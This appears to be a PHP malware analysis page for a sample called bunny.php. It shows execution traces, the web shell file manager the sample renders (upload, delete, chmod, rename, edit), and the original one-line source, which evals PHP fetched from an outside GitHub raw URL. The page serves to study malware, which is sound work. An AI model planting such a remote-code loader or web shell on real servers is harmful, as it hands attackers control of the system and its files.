3	48	0	0.040621	463280	is_readable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	215	1	'/var/www/html/uploads/prepend.php'
3	48	1	0.040637	463320
3	48	R			TRUE
3	49	0	0.040650	463280	perms	1		/var/www/html/uploads/bunny.php(1) : eval()'d code	216	1	'/var/www/html/uploads/prepend.php'
4	50	0	0.040664	463280	fileperms	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	237	1	'/var/www/html/uploads/prepend.php'
4	50	1	0.040679	463320
4	50	R			33261
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	237	$perms = 33261
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	246	$info = '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	264	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	265	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	268	$info .= 'x'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	270	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	271	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	274	$info .= 'x'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	276	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	277	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	280	$info .= 'x'
3	49	1	0.040819	463320
3	49	R			'-rwxr-xr-x'
3	51	0	0.040834	463280	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	217	1	'/var/www/html/uploads/prepend.php'
3	51	1	0.040851	463320
3	51	R			FALSE
3	52	0	0.040865	463280	is_readable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	217	1	'/var/www/html/uploads/prepend.php'
3	52	1	0.040881	463320
3	52	R			TRUE
3	53	0	0.040895	463216	date	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	234	1	'Y'
3	53	1	0.040961	465568
3	53	R			'2023'
2	5	1	0.040980	465280
2	5	R			NULL
1	3	1	0.040998	423808
			0.041027	341360
TRACE END   [2023-02-12 21:02:48.306818]

Generated HTML code
<html><head>
			<title>ILMU TEKNOLOGI</title>
			<link href="" rel="stylesheet" type="text/css">
			<style>
				body {
					font-family: "tahoma", cursive;
					background-color: black;
					color:cyan;
				}
				#content tr:hover{
					text-shadow:0px 0px 10px;
				}
				#content .first{
				background-color: green;
				}
				table{
					border: 1px #000000 dotted;
				}
				a{
					color:cyan;
					text-decoration: none;
				}
				a:hover{
					color:white;
					text-shadow:0px 0px 10px transparent;
				}
				input,select,textarea{
					border: 1px white solid;
					-moz-border-radius: 5px;
					-webkit-border-radius:5px;
					border-radius:5px;
				}
			</style>
		</head>
		<body>
			<h1>
				<center>
					<font color="cyan">GOOGLE</font>
				</center>
			</h1>
			<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tbody><tr>
					<td>
						<font color="white">aku nok ndi :</font> <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
		<font color="white">File Up :</font> <input type="file" name="file">
		<input type="submit" value="aplod :v">
		</form>
		</td>
		</tr></tbody></table><br><center></center><div id="content">
								  <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
								 	<tbody><tr class="first">
										<td>
											<center>Name</center>
										</td>
										<td>
											<center>Size</center>
										</td>
										<td>
											<center>Permission</center>
										</td>
										<td>
											<center>Modify</center>
										</td>
									</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
			<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td>
			<td><center>0 KB</center></td>
			<td><center>-rw-r--r--</center></td>
	  <td><center><form method="POST" action="?option&amp;path=/var/www/html">
	  <select name="opt">
	  	<option value="">Select</option>
	  	<option value="delete">Delete</option>
	  	<option value="chmod">Chmod</option>
	  	<option value="rename">Rename</option>
	  	<option value="edit">Edit</option>
	  </select>
	  <input type="hidden" name="type" value="file">
	  <input type="hidden" name="name" value="beneri.se_malware_analysis">
	  <input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
	  <input type="submit" value=">">
	  </form></center></td>
	  </tr><tr>
			<td><a href="?filesrc=/var/www/html/bunny.php&amp;path=/var/www/html">bunny.php</a></td>
			<td><center>0.104 KB</center></td>
			<td><center>-rw-rw-r--</center></td>
	  <td><center><form method="POST" action="?option&amp;path=/var/www/html">
	  <select name="opt">
	  	<option value="">Select</option>
	  	<option value="delete">Delete</option>
	  	<option value="chmod">Chmod</option>
	  	<option value="rename">Rename</option>
	  	<option value="edit">Edit</option>
	  </select>
	  <input type="hidden" name="type" value="file">
	  <input type="hidden" name="name" value="bunny.php">
	  <input type="hidden" name="path" value="/var/www/html/bunny.php">
	  <input type="submit" value=">">
	  </form></center></td>
	  </tr></tbody></table></div><br><center>Copyright © 1945 - 2023 GOOGLE</center></body></html>
Original PHP code
<?=eval("?>".file_get_contents("https://raw.githubusercontent.com/LanangAkira/OniChan/main/bunsin.php"));?>
PHP Malware Analysis

bunny.php

md5: 26bdbdd7283e881e3e70598a5ede29c2

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
